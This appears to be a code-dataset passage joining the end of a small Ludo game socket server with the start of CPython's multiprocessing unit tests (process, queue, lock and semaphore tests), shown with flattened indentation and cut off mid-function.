player_name = player_socket.recv(1024).decode().strip()
if(len(CLIENTS.keys()) == 0):
CLIENTS[player_name] = {'player_type' : 'player1'}
else:
CLIENTS[player_name] = {'player_type' : 'player2'}
CLIENTS[player_name]["player_socket"] = player_socket
CLIENTS[player_name]["address"] = addr
CLIENTS[player_name]["player_name"] = player_name
CLIENTS[player_name]["turn"] = False
print(f"Connection established with {player_name} : {addr}")
# ------------ Boilerplate Code Start
thread = Thread(target = handleClient, args=(player_socket,player_name,))
thread.start()
# ------------ Boilerplate Code End
def setup():
print("\n")
print("\t\t\t\t\t\t*** LUDO LADDER ***")
global SERVER
global PORT
global IP_ADDRESS
IP_ADDRESS = '127.0.0.1'
PORT = 6000
SERVER = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
SERVER.bind((IP_ADDRESS, PORT))
SERVER.listen(10)
print("\t\t\t\tSERVER IS WAITING FOR INCOMMING CONNECTIONS...")
print("\n")
acceptConnections()
setup()
|
_test_multiprocessing.py
|
#
# Unit tests for the multiprocessing package
#
import unittest
import unittest.mock
import queue as pyqueue
import time
import io
import itertools
import sys
import os
import gc
import errno
import signal
import array
import socket
import random
import logging
import subprocess
import struct
import operator
import pickle
import weakref
import warnings
import test.support
import test.support.script_helper
from test import support
# Skip tests if _multiprocessing wasn't built.
_multiprocessing = test.support.import_module('_multiprocessing')
# Skip tests if sem_open implementation is broken.
test.support.import_module('multiprocessing.synchronize')
import threading
import multiprocessing.connection
import multiprocessing.dummy
import multiprocessing.heap
import multiprocessing.managers
import multiprocessing.pool
import multiprocessing.queues
from multiprocessing import util
try:
from multiprocessing import reduction
HAS_REDUCTION = reduction.HAVE_SEND_HANDLE
except ImportError:
HAS_REDUCTION = False
try:
from multiprocessing.sharedctypes import Value, copy
HAS_SHAREDCTYPES = True
except ImportError:
HAS_SHAREDCTYPES = False
try:
from multiprocessing import shared_memory
HAS_SHMEM = True
except ImportError:
HAS_SHMEM = False
try:
import msvcrt
except ImportError:
msvcrt = None
#
#
#
# Timeout to wait until a process completes
TIMEOUT = 60.0 # seconds
def latin(s):
return s.encode('latin')
def close_queue(queue):
if isinstance(queue, multiprocessing.queues.Queue):
queue.close()
queue.join_thread()
def join_process(process):
# Since multiprocessing.Process has the same API than threading.Thread
# (join() and is_alive(), the support function can be reused
support.join_thread(process, timeout=TIMEOUT)
if os.name == "posix":
from multiprocessing import resource_tracker
def _resource_unlink(name, rtype):
resource_tracker._CLEANUP_FUNCS[rtype](name)
#
# Constants
#
LOG_LEVEL = util.SUBWARNING
#LOG_LEVEL = logging.DEBUG
DELTA = 0.1
CHECK_TIMINGS = False # making true makes tests take a lot longer
# and can sometimes cause some non-serious
# failures because some calls block a bit
# longer than expected
if CHECK_TIMINGS:
TIMEOUT1, TIMEOUT2, TIMEOUT3 = 0.82, 0.35, 1.4
else:
TIMEOUT1, TIMEOUT2, TIMEOUT3 = 0.1, 0.1, 0.1
HAVE_GETVALUE = not getattr(_multiprocessing,
'HAVE_BROKEN_SEM_GETVALUE', False)
WIN32 = (sys.platform == "win32")
from multiprocessing.connection import wait
def wait_for_handle(handle, timeout):
if timeout is not None and timeout < 0.0:
timeout = None
return wait([handle], timeout)
try:
MAXFD = os.sysconf("SC_OPEN_MAX")
except:
MAXFD = 256
# To speed up tests when using the forkserver, we can preload these:
PRELOAD = ['__main__', 'test.test_multiprocessing_forkserver']
#
# Some tests require ctypes
#
try:
from ctypes import Structure, c_int, c_double, c_longlong
except ImportError:
Structure = object
c_int = c_double = c_longlong = None
def check_enough_semaphores():
"""Check that the system supports enough semaphores to run the test."""
# minimum number of semaphores available according to POSIX
nsems_min = 256
try:
nsems = os.sysconf("SC_SEM_NSEMS_MAX")
except (AttributeError, ValueError):
# sysconf not available or setting not available
return
if nsems == -1 or nsems >= nsems_min:
return
raise unittest.SkipTest("The OS doesn't support enough semaphores "
"to run the test (required: %d)." % nsems_min)
#
# Creates a wrapper for a function which records the time it takes to finish
#
class TimingWrapper(object):
def __init__(self, func):
self.func = func
self.elapsed = None
def __call__(self, *args, **kwds):
t = time.monotonic()
try:
return self.func(*args, **kwds)
finally:
self.elapsed = time.monotonic() - t
#
# Base class for test cases
#
class BaseTestCase(object):
ALLOWED_TYPES = ('processes', 'manager', 'threads')
def assertTimingAlmostEqual(self, a, b):
if CHECK_TIMINGS:
self.assertAlmostEqual(a, b, 1)
def assertReturnsIfImplemented(self, value, func, *args):
try:
res = func(*args)
except NotImplementedError:
pass
else:
return self.assertEqual(value, res)
# For the sanity of Windows users, rather than crashing or freezing in
# multiple ways.
def __reduce__(self, *args):
raise NotImplementedError("shouldn't try to pickle a test case")
__reduce_ex__ = __reduce__
#
# Return the value of a semaphore
#
def get_value(self):
try:
return self.get_value()
except AttributeError:
try:
return self._Semaphore__value
except AttributeError:
try:
return self._value
except AttributeError:
raise NotImplementedError
#
# Testcases
#
class DummyCallable:
def __call__(self, q, c):
assert isinstance(c, DummyCallable)
q.put(5)
class _TestProcess(BaseTestCase):
ALLOWED_TYPES = ('processes', 'threads')
def test_current(self):
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
current = self.current_process()
authkey = current.authkey
self.assertTrue(current.is_alive())
self.assertTrue(not current.daemon)
self.assertIsInstance(authkey, bytes)
self.assertTrue(len(authkey) > 0)
self.assertEqual(current.ident, os.getpid())
self.assertEqual(current.exitcode, None)
def test_daemon_argument(self):
if self.TYPE == "threads":
self.skipTest('test not appropriate for {}'.format(self.TYPE))
# By default uses the current process's daemon flag.
proc0 = self.Process(target=self._test)
self.assertEqual(proc0.daemon, self.current_process().daemon)
proc1 = self.Process(target=self._test, daemon=True)
self.assertTrue(proc1.daemon)
proc2 = self.Process(target=self._test, daemon=False)
self.assertFalse(proc2.daemon)
@classmethod
def _test(cls, q, *args, **kwds):
current = cls.current_process()
q.put(args)
q.put(kwds)
q.put(current.name)
if cls.TYPE != 'threads':
q.put(bytes(current.authkey))
q.put(current.pid)
def test_parent_process_attributes(self):
if self.TYPE == "threads":
self.skipTest('test not appropriate for {}'.format(self.TYPE))
self.assertIsNone(self.parent_process())
rconn, wconn = self.Pipe(duplex=False)
p = self.Process(target=self._test_send_parent_process, args=(wconn,))
p.start()
p.join()
parent_pid, parent_name = rconn.recv()
self.assertEqual(parent_pid, self.current_process().pid)
self.assertEqual(parent_pid, os.getpid())
self.assertEqual(parent_name, self.current_process().name)
@classmethod
def _test_send_parent_process(cls, wconn):
from multiprocessing.process import parent_process
wconn.send([parent_process().pid, parent_process().name])
def test_parent_process(self):
if self.TYPE == "threads":
self.skipTest('test not appropriate for {}'.format(self.TYPE))
# Launch a child process. Make it launch a grandchild process. Kill the
# child process and make sure that the grandchild notices the death of
# its parent (a.k.a the child process).
rconn, wconn = self.Pipe(duplex=False)
p = self.Process(
target=self._test_create_grandchild_process, args=(wconn, ))
p.start()
if not rconn.poll(timeout=60):
raise AssertionError("Could not communicate with child process")
parent_process_status = rconn.recv()
self.assertEqual(parent_process_status, "alive")
p.terminate()
p.join()
if not rconn.poll(timeout=60):
raise AssertionError("Could not communicate with child process")
parent_process_status = rconn.recv()
self.assertEqual(parent_process_status, "not alive")
@classmethod
def _test_create_grandchild_process(cls, wconn):
p = cls.Process(target=cls._test_report_parent_status, args=(wconn, ))
p.start()
time.sleep(300)
@classmethod
def _test_report_parent_status(cls, wconn):
from multiprocessing.process import parent_process
wconn.send("alive" if parent_process().is_alive() else "not alive")
parent_process().join(timeout=5)
wconn.send("alive" if parent_process().is_alive() else "not alive")
def test_process(self):
q = self.Queue(1)
e = self.Event()
args = (q, 1, 2)
kwargs = {'hello':23, 'bye':2.54}
name = 'SomeProcess'
p = self.Process(
target=self._test, args=args, kwargs=kwargs, name=name
)
p.daemon = True
current = self.current_process()
if self.TYPE != 'threads':
self.assertEqual(p.authkey, current.authkey)
self.assertEqual(p.is_alive(), False)
self.assertEqual(p.daemon, True)
self.assertNotIn(p, self.active_children())
self.assertTrue(type(self.active_children()) is list)
self.assertEqual(p.exitcode, None)
p.start()
self.assertEqual(p.exitcode, None)
self.assertEqual(p.is_alive(), True)
self.assertIn(p, self.active_children())
self.assertEqual(q.get(), args[1:])
self.assertEqual(q.get(), kwargs)
self.assertEqual(q.get(), p.name)
if self.TYPE != 'threads':
self.assertEqual(q.get(), current.authkey)
self.assertEqual(q.get(), p.pid)
p.join()
self.assertEqual(p.exitcode, 0)
self.assertEqual(p.is_alive(), False)
self.assertNotIn(p, self.active_children())
close_queue(q)
@classmethod
def _sleep_some(cls):
time.sleep(100)
@classmethod
def _test_sleep(cls, delay):
time.sleep(delay)
def _kill_process(self, meth):
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
p = self.Process(target=self._sleep_some)
p.daemon = True
p.start()
self.assertEqual(p.is_alive(), True)
self.assertIn(p, self.active_children())
self.assertEqual(p.exitcode, None)
join = TimingWrapper(p.join)
self.assertEqual(join(0), None)
self.assertTimingAlmostEqual(join.elapsed, 0.0)
self.assertEqual(p.is_alive(), True)
self.assertEqual(join(-1), None)
self.assertTimingAlmostEqual(join.elapsed, 0.0)
self.assertEqual(p.is_alive(), True)
# XXX maybe terminating too soon causes the problems on Gentoo...
time.sleep(1)
meth(p)
if hasattr(signal, 'alarm'):
# On the Gentoo buildbot waitpid() often seems to block forever.
# We use alarm() to interrupt it if it blocks for too long.
def handler(*args):
raise RuntimeError('join took too long: %s' % p)
old_handler = signal.signal(signal.SIGALRM, handler)
try:
signal.alarm(10)
self.assertEqual(join(), None)
finally:
signal.alarm(0)
signal.signal(signal.SIGALRM, old_handler)
else:
self.assertEqual(join(), None)
self.assertTimingAlmostEqual(join.elapsed, 0.0)
self.assertEqual(p.is_alive(), False)
self.assertNotIn(p, self.active_children())
p.join()
return p.exitcode
def test_terminate(self):
exitcode = self._kill_process(multiprocessing.Process.terminate)
if os.name != 'nt':
self.assertEqual(exitcode, -signal.SIGTERM)
def test_kill(self):
exitcode = self._kill_process(multiprocessing.Process.kill)
if os.name != 'nt':
self.assertEqual(exitcode, -signal.SIGKILL)
def test_cpu_count(self):
try:
cpus = multiprocessing.cpu_count()
except NotImplementedError:
cpus = 1
self.assertTrue(type(cpus) is int)
self.assertTrue(cpus >= 1)
def test_active_children(self):
self.assertEqual(type(self.active_children()), list)
p = self.Process(target=time.sleep, args=(DELTA,))
self.assertNotIn(p, self.active_children())
p.daemon = True
p.start()
self.assertIn(p, self.active_children())
p.join()
self.assertNotIn(p, self.active_children())
@classmethod
def _test_recursion(cls, wconn, id):
wconn.send(id)
if len(id) < 2:
for i in range(2):
p = cls.Process(
target=cls._test_recursion, args=(wconn, id+[i])
)
p.start()
p.join()
def test_recursion(self):
rconn, wconn = self.Pipe(duplex=False)
self._test_recursion(wconn, [])
time.sleep(DELTA)
result = []
while rconn.poll():
result.append(rconn.recv())
expected = [
[],
[0],
[0, 0],
[0, 1],
[1],
[1, 0],
[1, 1]
]
self.assertEqual(result, expected)
@classmethod
def _test_sentinel(cls, event):
event.wait(10.0)
def test_sentinel(self):
if self.TYPE == "threads":
self.skipTest('test not appropriate for {}'.format(self.TYPE))
event = self.Event()
p = self.Process(target=self._test_sentinel, args=(event,))
with self.assertRaises(ValueError):
p.sentinel
p.start()
self.addCleanup(p.join)
sentinel = p.sentinel
self.assertIsInstance(sentinel, int)
self.assertFalse(wait_for_handle(sentinel, timeout=0.0))
event.set()
p.join()
self.assertTrue(wait_for_handle(sentinel, timeout=1))
@classmethod
def _test_close(cls, rc=0, q=None):
if q is not None:
q.get()
sys.exit(rc)
def test_close(self):
if self.TYPE == "threads":
self.skipTest('test not appropriate for {}'.format(self.TYPE))
q = self.Queue()
p = self.Process(target=self._test_close, kwargs={'q': q})
p.daemon = True
p.start()
self.assertEqual(p.is_alive(), True)
# Child is still alive, cannot close
with self.assertRaises(ValueError):
p.close()
q.put(None)
p.join()
self.assertEqual(p.is_alive(), False)
self.assertEqual(p.exitcode, 0)
p.close()
with self.assertRaises(ValueError):
p.is_alive()
with self.assertRaises(ValueError):
p.join()
with self.assertRaises(ValueError):
p.terminate()
p.close()
wr = weakref.ref(p)
del p
gc.collect()
self.assertIs(wr(), None)
close_queue(q)
def test_many_processes(self):
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
sm = multiprocessing.get_start_method()
N = 5 if sm == 'spawn' else 100
# Try to overwhelm the forkserver loop with events
procs = [self.Process(target=self._test_sleep, args=(0.01,))
for i in range(N)]
for p in procs:
p.start()
for p in procs:
join_process(p)
for p in procs:
self.assertEqual(p.exitcode, 0)
procs = [self.Process(target=self._sleep_some)
for i in range(N)]
for p in procs:
p.start()
time.sleep(0.001) # let the children start...
for p in procs:
p.terminate()
for p in procs:
join_process(p)
if os.name != 'nt':
exitcodes = [-signal.SIGTERM]
if sys.platform == 'darwin':
# bpo-31510: On macOS, killing a freshly started process with
# SIGTERM sometimes kills the process with SIGKILL.
exitcodes.append(-signal.SIGKILL)
for p in procs:
self.assertIn(p.exitcode, exitcodes)
def test_lose_target_ref(self):
c = DummyCallable()
wr = weakref.ref(c)
q = self.Queue()
p = self.Process(target=c, args=(q, c))
del c
p.start()
p.join()
self.assertIs(wr(), None)
self.assertEqual(q.get(), 5)
close_queue(q)
@classmethod
def _test_child_fd_inflation(self, evt, q):
q.put(test.support.fd_count())
evt.wait()
def test_child_fd_inflation(self):
# Number of fds in child processes should not grow with the
# number of running children.
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
sm = multiprocessing.get_start_method()
if sm == 'fork':
# The fork method by design inherits all fds from the parent,
# trying to go against it is a lost battle
self.skipTest('test not appropriate for {}'.format(sm))
N = 5
evt = self.Event()
q = self.Queue()
procs = [self.Process(target=self._test_child_fd_inflation, args=(evt, q))
for i in range(N)]
for p in procs:
p.start()
try:
fd_counts = [q.get() for i in range(N)]
self.assertEqual(len(set(fd_counts)), 1, fd_counts)
finally:
evt.set()
for p in procs:
p.join()
close_queue(q)
@classmethod
def _test_wait_for_threads(self, evt):
def func1():
time.sleep(0.5)
evt.set()
def func2():
time.sleep(20)
evt.clear()
threading.Thread(target=func1).start()
threading.Thread(target=func2, daemon=True).start()
def test_wait_for_threads(self):
# A child process should wait for non-daemonic threads to end
# before exiting
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
evt = self.Event()
proc = self.Process(target=self._test_wait_for_threads, args=(evt,))
proc.start()
proc.join()
self.assertTrue(evt.is_set())
@classmethod
def _test_error_on_stdio_flush(self, evt, break_std_streams={}):
for stream_name, action in break_std_streams.items():
if action == 'close':
stream = io.StringIO()
stream.close()
else:
assert action == 'remove'
stream = None
setattr(sys, stream_name, None)
evt.set()
def test_error_on_stdio_flush_1(self):
# Check that Process works with broken standard streams
streams = [io.StringIO(), None]
streams[0].close()
for stream_name in ('stdout', 'stderr'):
for stream in streams:
old_stream = getattr(sys, stream_name)
setattr(sys, stream_name, stream)
try:
evt = self.Event()
proc = self.Process(target=self._test_error_on_stdio_flush,
args=(evt,))
proc.start()
proc.join()
self.assertTrue(evt.is_set())
self.assertEqual(proc.exitcode, 0)
finally:
setattr(sys, stream_name, old_stream)
def test_error_on_stdio_flush_2(self):
# Same as test_error_on_stdio_flush_1(), but standard streams are
# broken by the child process
for stream_name in ('stdout', 'stderr'):
for action in ('close', 'remove'):
old_stream = getattr(sys, stream_name)
try:
evt = self.Event()
proc = self.Process(target=self._test_error_on_stdio_flush,
args=(evt, {stream_name: action}))
proc.start()
proc.join()
self.assertTrue(evt.is_set())
self.assertEqual(proc.exitcode, 0)
finally:
setattr(sys, stream_name, old_stream)
@classmethod
def _sleep_and_set_event(self, evt, delay=0.0):
time.sleep(delay)
evt.set()
def check_forkserver_death(self, signum):
# bpo-31308: if the forkserver process has died, we should still
# be able to create and run new Process instances (the forkserver
# is implicitly restarted).
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
sm = multiprocessing.get_start_method()
if sm != 'forkserver':
# The fork method by design inherits all fds from the parent,
# trying to go against it is a lost battle
self.skipTest('test not appropriate for {}'.format(sm))
from multiprocessing.forkserver import _forkserver
_forkserver.ensure_running()
# First process sleeps 500 ms
delay = 0.5
evt = self.Event()
proc = self.Process(target=self._sleep_and_set_event, args=(evt, delay))
proc.start()
pid = _forkserver._forkserver_pid
os.kill(pid, signum)
# give time to the fork server to die and time to proc to complete
time.sleep(delay * 2.0)
evt2 = self.Event()
proc2 = self.Process(target=self._sleep_and_set_event, args=(evt2,))
proc2.start()
proc2.join()
self.assertTrue(evt2.is_set())
self.assertEqual(proc2.exitcode, 0)
proc.join()
self.assertTrue(evt.is_set())
self.assertIn(proc.exitcode, (0, 255))
def test_forkserver_sigint(self):
# Catchable signal
self.check_forkserver_death(signal.SIGINT)
def test_forkserver_sigkill(self):
# Uncatchable signal
if os.name != 'nt':
self.check_forkserver_death(signal.SIGKILL)
#
#
#
class _UpperCaser(multiprocessing.Process):
def __init__(self):
multiprocessing.Process.__init__(self)
self.child_conn, self.parent_conn = multiprocessing.Pipe()
def run(self):
self.parent_conn.close()
for s in iter(self.child_conn.recv, None):
self.child_conn.send(s.upper())
self.child_conn.close()
def submit(self, s):
assert type(s) is str
self.parent_conn.send(s)
return self.parent_conn.recv()
def stop(self):
self.parent_conn.send(None)
self.parent_conn.close()
self.child_conn.close()
class _TestSubclassingProcess(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def test_subclassing(self):
uppercaser = _UpperCaser()
uppercaser.daemon = True
uppercaser.start()
self.assertEqual(uppercaser.submit('hello'), 'HELLO')
self.assertEqual(uppercaser.submit('world'), 'WORLD')
uppercaser.stop()
uppercaser.join()
def test_stderr_flush(self):
# sys.stderr is flushed at process shutdown (issue #13812)
if self.TYPE == "threads":
self.skipTest('test not appropriate for {}'.format(self.TYPE))
testfn = test.support.TESTFN
self.addCleanup(test.support.unlink, testfn)
proc = self.Process(target=self._test_stderr_flush, args=(testfn,))
proc.start()
proc.join()
with open(testfn, 'r') as f:
err = f.read()
# The whole traceback was printed
self.assertIn("ZeroDivisionError", err)
self.assertIn("test_multiprocessing.py", err)
self.assertIn("1/0 # MARKER", err)
@classmethod
def _test_stderr_flush(cls, testfn):
fd = os.open(testfn, os.O_WRONLY | os.O_CREAT | os.O_EXCL)
sys.stderr = open(fd, 'w', closefd=False)
1/0 # MARKER
@classmethod
def _test_sys_exit(cls, reason, testfn):
fd = os.open(testfn, os.O_WRONLY | os.O_CREAT | os.O_EXCL)
sys.stderr = open(fd, 'w', closefd=False)
sys.exit(reason)
def test_sys_exit(self):
# See Issue 13854
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
testfn = test.support.TESTFN
self.addCleanup(test.support.unlink, testfn)
for reason in (
[1, 2, 3],
'ignore this',
):
p = self.Process(target=self._test_sys_exit, args=(reason, testfn))
p.daemon = True
p.start()
join_process(p)
self.assertEqual(p.exitcode, 1)
with open(testfn, 'r') as f:
content = f.read()
self.assertEqual(content.rstrip(), str(reason))
os.unlink(testfn)
for reason in (True, False, 8):
p = self.Process(target=sys.exit, args=(reason,))
p.daemon = True
p.start()
join_process(p)
self.assertEqual(p.exitcode, reason)
#
#
#
def queue_empty(q):
if hasattr(q, 'empty'):
return q.empty()
else:
return q.qsize() == 0
def queue_full(q, maxsize):
if hasattr(q, 'full'):
return q.full()
else:
return q.qsize() == maxsize
class _TestQueue(BaseTestCase):
@classmethod
def _test_put(cls, queue, child_can_start, parent_can_continue):
child_can_start.wait()
for i in range(6):
queue.get()
parent_can_continue.set()
def test_put(self):
MAXSIZE = 6
queue = self.Queue(maxsize=MAXSIZE)
child_can_start = self.Event()
parent_can_continue = self.Event()
proc = self.Process(
target=self._test_put,
args=(queue, child_can_start, parent_can_continue)
)
proc.daemon = True
proc.start()
self.assertEqual(queue_empty(queue), True)
self.assertEqual(queue_full(queue, MAXSIZE), False)
queue.put(1)
queue.put(2, True)
queue.put(3, True, None)
queue.put(4, False)
queue.put(5, False, None)
queue.put_nowait(6)
# the values may be in buffer but not yet in pipe so sleep a bit
time.sleep(DELTA)
self.assertEqual(queue_empty(queue), False)
self.assertEqual(queue_full(queue, MAXSIZE), True)
put = TimingWrapper(queue.put)
put_nowait = TimingWrapper(queue.put_nowait)
self.assertRaises(pyqueue.Full, put, 7, False)
self.assertTimingAlmostEqual(put.elapsed, 0)
self.assertRaises(pyqueue.Full, put, 7, False, None)
self.assertTimingAlmostEqual(put.elapsed, 0)
self.assertRaises(pyqueue.Full, put_nowait, 7)
self.assertTimingAlmostEqual(put_nowait.elapsed, 0)
self.assertRaises(pyqueue.Full, put, 7, True, TIMEOUT1)
self.assertTimingAlmostEqual(put.elapsed, TIMEOUT1)
self.assertRaises(pyqueue.Full, put, 7, False, TIMEOUT2)
self.assertTimingAlmostEqual(put.elapsed, 0)
self.assertRaises(pyqueue.Full, put, 7, True, timeout=TIMEOUT3)
self.assertTimingAlmostEqual(put.elapsed, TIMEOUT3)
child_can_start.set()
parent_can_continue.wait()
self.assertEqual(queue_empty(queue), True)
self.assertEqual(queue_full(queue, MAXSIZE), False)
proc.join()
close_queue(queue)
@classmethod
def _test_get(cls, queue, child_can_start, parent_can_continue):
child_can_start.wait()
#queue.put(1)
queue.put(2)
queue.put(3)
queue.put(4)
queue.put(5)
parent_can_continue.set()
def test_get(self):
queue = self.Queue()
child_can_start = self.Event()
parent_can_continue = self.Event()
proc = self.Process(
target=self._test_get,
args=(queue, child_can_start, parent_can_continue)
)
proc.daemon = True
proc.start()
self.assertEqual(queue_empty(queue), True)
child_can_start.set()
parent_can_continue.wait()
time.sleep(DELTA)
self.assertEqual(queue_empty(queue), False)
# Hangs unexpectedly, remove for now
#self.assertEqual(queue.get(), 1)
self.assertEqual(queue.get(True, None), 2)
self.assertEqual(queue.get(True), 3)
self.assertEqual(queue.get(timeout=1), 4)
self.assertEqual(queue.get_nowait(), 5)
self.assertEqual(queue_empty(queue), True)
get = TimingWrapper(queue.get)
get_nowait = TimingWrapper(queue.get_nowait)
self.assertRaises(pyqueue.Empty, get, False)
self.assertTimingAlmostEqual(get.elapsed, 0)
self.assertRaises(pyqueue.Empty, get, False, None)
self.assertTimingAlmostEqual(get.elapsed, 0)
self.assertRaises(pyqueue.Empty, get_nowait)
self.assertTimingAlmostEqual(get_nowait.elapsed, 0)
self.assertRaises(pyqueue.Empty, get, True, TIMEOUT1)
self.assertTimingAlmostEqual(get.elapsed, TIMEOUT1)
self.assertRaises(pyqueue.Empty, get, False, TIMEOUT2)
self.assertTimingAlmostEqual(get.elapsed, 0)
self.assertRaises(pyqueue.Empty, get, timeout=TIMEOUT3)
self.assertTimingAlmostEqual(get.elapsed, TIMEOUT3)
proc.join()
close_queue(queue)
@classmethod
def _test_fork(cls, queue):
for i in range(10, 20):
queue.put(i)
# note that at this point the items may only be buffered, so the
# process cannot shutdown until the feeder thread has finished
# pushing items onto the pipe.
def test_fork(self):
# Old versions of Queue would fail to create a new feeder
# thread for a forked process if the original process had its
# own feeder thread. This test checks that this no longer
# happens.
queue = self.Queue()
# put items on queue so that main process starts a feeder thread
for i in range(10):
queue.put(i)
# wait to make sure thread starts before we fork a new process
time.sleep(DELTA)
# fork process
p = self.Process(target=self._test_fork, args=(queue,))
p.daemon = True
p.start()
# check that all expected items are in the queue
for i in range(20):
self.assertEqual(queue.get(), i)
self.assertRaises(pyqueue.Empty, queue.get, False)
p.join()
close_queue(queue)
def test_qsize(self):
q = self.Queue()
try:
self.assertEqual(q.qsize(), 0)
except NotImplementedError:
self.skipTest('qsize method not implemented')
q.put(1)
self.assertEqual(q.qsize(), 1)
q.put(5)
self.assertEqual(q.qsize(), 2)
q.get()
self.assertEqual(q.qsize(), 1)
q.get()
self.assertEqual(q.qsize(), 0)
close_queue(q)
@classmethod
def _test_task_done(cls, q):
for obj in iter(q.get, None):
time.sleep(DELTA)
q.task_done()
def test_task_done(self):
queue = self.JoinableQueue()
workers = [self.Process(target=self._test_task_done, args=(queue,))
for i in range(4)]
for p in workers:
p.daemon = True
p.start()
for i in range(10):
queue.put(i)
queue.join()
for p in workers:
queue.put(None)
for p in workers:
p.join()
close_queue(queue)
def test_no_import_lock_contention(self):
with test.support.temp_cwd():
module_name = 'imported_by_an_imported_module'
with open(module_name + '.py', 'w') as f:
f.write("""if 1:
import multiprocessing
q = multiprocessing.Queue()
q.put('knock knock')
q.get(timeout=3)
q.close()
del q
""")
with test.support.DirsOnSysPath(os.getcwd()):
try:
__import__(module_name)
except pyqueue.Empty:
self.fail("Probable regression on import lock contention;"
" see Issue #22853")
def test_timeout(self):
q = multiprocessing.Queue()
start = time.monotonic()
self.assertRaises(pyqueue.Empty, q.get, True, 0.200)
delta = time.monotonic() - start
# bpo-30317: Tolerate a delta of 100 ms because of the bad clock
# resolution on Windows (usually 15.6 ms). x86 Windows7 3.x once
# failed because the delta was only 135.8 ms.
self.assertGreaterEqual(delta, 0.100)
close_queue(q)
def test_queue_feeder_donot_stop_onexc(self):
# bpo-30414: verify feeder handles exceptions correctly
if self.TYPE != 'processes':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
class NotSerializable(object):
def __reduce__(self):
raise AttributeError
with test.support.captured_stderr():
q = self.Queue()
q.put(NotSerializable())
q.put(True)
# bpo-30595: use a timeout of 1 second for slow buildbots
self.assertTrue(q.get(timeout=1.0))
close_queue(q)
with test.support.captured_stderr():
# bpo-33078: verify that the queue size is correctly handled
# on errors.
q = self.Queue(maxsize=1)
q.put(NotSerializable())
q.put(True)
try:
self.assertEqual(q.qsize(), 1)
except NotImplementedError:
# qsize is not available on all platform as it
# relies on sem_getvalue
pass
# bpo-30595: use a timeout of 1 second for slow buildbots
self.assertTrue(q.get(timeout=1.0))
# Check that the size of the queue is correct
self.assertTrue(q.empty())
close_queue(q)
def test_queue_feeder_on_queue_feeder_error(self):
# bpo-30006: verify feeder handles exceptions using the
# _on_queue_feeder_error hook.
if self.TYPE != 'processes':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
class NotSerializable(object):
"""Mock unserializable object"""
def __init__(self):
self.reduce_was_called = False
self.on_queue_feeder_error_was_called = False
def __reduce__(self):
self.reduce_was_called = True
raise AttributeError
class SafeQueue(multiprocessing.queues.Queue):
"""Queue with overloaded _on_queue_feeder_error hook"""
@staticmethod
def _on_queue_feeder_error(e, obj):
if (isinstance(e, AttributeError) and
isinstance(obj, NotSerializable)):
obj.on_queue_feeder_error_was_called = True
not_serializable_obj = NotSerializable()
# The captured_stderr reduces the noise in the test report
with test.support.captured_stderr():
q = SafeQueue(ctx=multiprocessing.get_context())
q.put(not_serializable_obj)
# Verify that q is still functioning correctly
q.put(True)
self.assertTrue(q.get(timeout=1.0))
# Assert that the serialization and the hook have been called correctly
self.assertTrue(not_serializable_obj.reduce_was_called)
self.assertTrue(not_serializable_obj.on_queue_feeder_error_was_called)
def test_closed_queue_put_get_exceptions(self):
for q in multiprocessing.Queue(), multiprocessing.JoinableQueue():
q.close()
with self.assertRaisesRegex(ValueError, 'is closed'):
q.put('foo')
with self.assertRaisesRegex(ValueError, 'is closed'):
q.get()
#
#
#
class _TestLock(BaseTestCase):
def test_lock(self):
lock = self.Lock()
self.assertEqual(lock.acquire(), True)
self.assertEqual(lock.acquire(False), False)
self.assertEqual(lock.release(), None)
self.assertRaises((ValueError, threading.ThreadError), lock.release)
def test_rlock(self):
lock = self.RLock()
self.assertEqual(lock.acquire(), True)
self.assertEqual(lock.acquire(), True)
self.assertEqual(lock.acquire(), True)
self.assertEqual(lock.release(), None)
self.assertEqual(lock.release(), None)
self.assertEqual(lock.release(), None)
self.assertRaises((AssertionError, RuntimeError), lock.release)
def test_lock_context(self):
with self.Lock():
pass
class _TestSemaphore(BaseTestCase):
def _test_semaphore(self, sem):
self.assertReturnsIfImplemented(2, get_value, sem)
self.assertEqual(sem.acquire(), True)
self.assertReturnsIfImplemented(1, get_value, sem)
self.assertEqual(sem.acquire(), True)
self.assertReturnsIfImplemented(0, get_value, sem)
self.assertEqual(sem.acquire(False), False)
self.assertReturnsIfImplemented(0, get_value, sem)
self.assertEqual(sem.release(), None)
self.assertReturnsIfImplemented(1, get_value, sem)
self.assertEqual(sem.release(), None)
self.assertReturnsIfImplemented(2, get_value, sem)
def test_semaphore(self):
sem = self.Semaphore(2)
self._test_semaphore(sem)
self.assertEqual(sem.release(), None)
self.assertReturnsIfImplemented(3, get_value, sem)
self.assertEqual(sem.release(), None)
self.assertReturnsIfImplemented(4, get_value, sem)
def test_bounded_semaphore(self):
sem = self.BoundedSemaphore(2)
self._test_semaphore(sem)
# Currently fails on OS/X
#if HAVE_GETVALUE:
# self.assertRaises(ValueError, sem.release)
# self.assertReturnsIfImplemented(2, get_value, sem)
def test_timeout(self):
if self.TYPE != 'processes':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
sem = self.Semaphore(0)
acquire = TimingWrapper(sem.acquire)
self.assertEqual(acquire(False), False)
self.assertTimingAlmostEqual(acquire.elapsed, 0.0)
self.assertEqual(acquire(False, None), False)
self.assertTimingAlmostEqual(acquire.elapsed, 0.0)
self.assertEqual(acquire(False, TIMEOUT1), False)
self.assertTimingAlmostEqual(acquire.elapsed, 0)
self.assertEqual(acquire(True, TIMEOUT2), False)
self.assertTimingAlmostEqual(acquire.elapsed, TIMEOUT2)
self.assertEqual(acquire(timeout=TIMEOUT3), False)
self.assertTimingAlmostEqual(acquire.elapsed, TIMEOUT3)
class _TestCondition(BaseTestCase):
@classmethod
def f(cls, cond, sleeping, woken, timeout=None):
cond.acquire()
sleeping.release()
cond.wait(timeout)
woken.release()
cond.release()
def assertReachesEventually(self, func, value):
for i in range(10):
try:
